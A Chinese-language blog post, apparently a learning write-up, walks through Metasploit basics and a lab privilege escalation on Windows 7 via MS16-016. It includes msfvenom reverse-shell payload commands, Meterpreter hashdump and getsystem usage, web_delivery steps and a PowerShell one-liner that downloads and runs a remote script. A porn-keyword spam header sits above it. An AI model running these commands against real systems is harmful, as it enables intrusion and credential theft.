日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

提权学习之旅——利用Metasploit提权

發布時間:2024/9/30 编程问答 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 提权学习之旅——利用Metasploit提权 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Metasploit基礎

0x00:簡介

Metasploit是一個漏洞利用框架,簡稱msf。是一個免費的、可下載的框架,通過它可以很容易地獲取、開發并對計算機軟件漏洞實施攻擊,,而且本身附帶數百個已知軟件漏洞的專業級漏洞攻擊工具。是信息收集、漏洞掃描、權限提升、內網滲透等集成的工具。

msf一般會有四種接口對外提供,分別為

  • msfconsole
  • msfcli
  • msfgui
  • msfweb

0x01:模塊

  • exploit
利用程序,針對漏洞、權限進行利用
  • payload
用于在目標系統中運行任意命令或執行特定代碼,主要用于shell獲取
  • auxiliary
該模塊包含了掃描、嗅探、指紋識別、網絡協議欺騙等相關功能模塊
  • encoder
該模塊主要針對exploit模塊進行代碼免殺,以逃過殺毒軟件、防火墻、ids等安全防護機制的檢測

0x03:基礎命令

search mysql #查找 use exploit/multi/handler #使用 info #查看信息 show exploits/payloads/options #顯示可用信息 exploit/run #執行 exploit -j #后臺運行 back #返回上一級 sessions -i #查看當前可用會話 sessions -K #殺死所有活躍會話

getuid #獲得運行Meterpreter會話的用戶名,從而查看當前會話具有的權限 sysinfo #列出受控主機的系統信息 getprivs #盡可能多地獲取目標主機上的特權 getsystem #通過各種攻擊向量來提升到系統用戶權限 hashdump #導出目標主機中的口令哈希值 screenshot #對目標主機的屏幕進行截圖 background #將當前Meterpreter shell轉為后臺運行 quit #關閉當前Meterpreter會話,返回MSF終端 ps #顯示所有運行進程以及關聯的用戶賬戶 migrate PID #遷移到一個指定的進程PID execute -f cmd.exe -i# 執行從cmd.exe命令進行交互 shell #以所有可用令牌來運行一個交互的shell

生成exe程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

生成php程序

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

反彈shell

exploit/multi/hander
  • Msfvenom生成程序
  • 使用handler執行exp
  • 在目標機器運行Msfvenom生成程序
  • 返回session
  • 將剛才生成的shy.php上傳至另外一臺主機的Web目錄,進行訪問

    發現一個session已經傳過來了

    這便是一個簡單的反彈shell的操作,如果要連接上只需執行如下命令即可

    sessions -i 1


    使用background命令使其回到后臺運行

    但是感覺連接的不是太穩定,容易出現超時狀態。

    exploit/multi/script/web_delivery
  • 使用web_delivery返回腳本執行并加載exp
  • 在目標機器運行腳本
  • 返回session
  • 先使用web_delivery

    use exploit/multi/script/web_delivery

    其次查看下信息

    這里將targets設置為2,然后查找相應的payload進行設置

    設置好之后,設置需要的參數

    運行將下面的payload拿到目標機器中執行,反彈成功

    這個方法相較于上一個穩定一點,這里就截一下目標機器的圖片,測試一下


    測試成功。

    利用Metasploit提權

    0x00:MS16-016漏洞簡介

    MS16-016(WebDAV特權提升漏洞),Microsoft Web分布式創作和版本管理(WebDAV)客戶端驗證輸入不當,就會存在特權提升漏洞,成功利用此漏洞可以使用提升的特權執行任意代碼

    漏洞影響:

    Windows Vista SP2 Windows Server 2008 x86 & x64 Windows Server 2008 R2 x64 Windows 7 x86 & x64 Windows 8.1 x86 & x64

    環境準備:

    win7 192.168.186.131 kail 192.168.186.134

    還是先使用web_delivery進行反彈shell

    連接成功,查看當前用戶

    接下來利用powershell遠程下載Sherlock腳本并進行檢測

    powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1');Find-AllVulns" >shy.txt

    發現存在MS16-016漏洞,直接使用msf搜索看是否有這個漏洞的exp

    使用一下,選擇一下session

    use exploit/windows/local/ms16_016_webdav


    進行攻擊,即可提權到system

    總結

    這次的學習簡單的了解了Metasploit,以及相應的提權操作,繼續學習,沖沖沖!

    總結

    以上是生活随笔為你收集整理的提权学习之旅——利用Metasploit提权的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。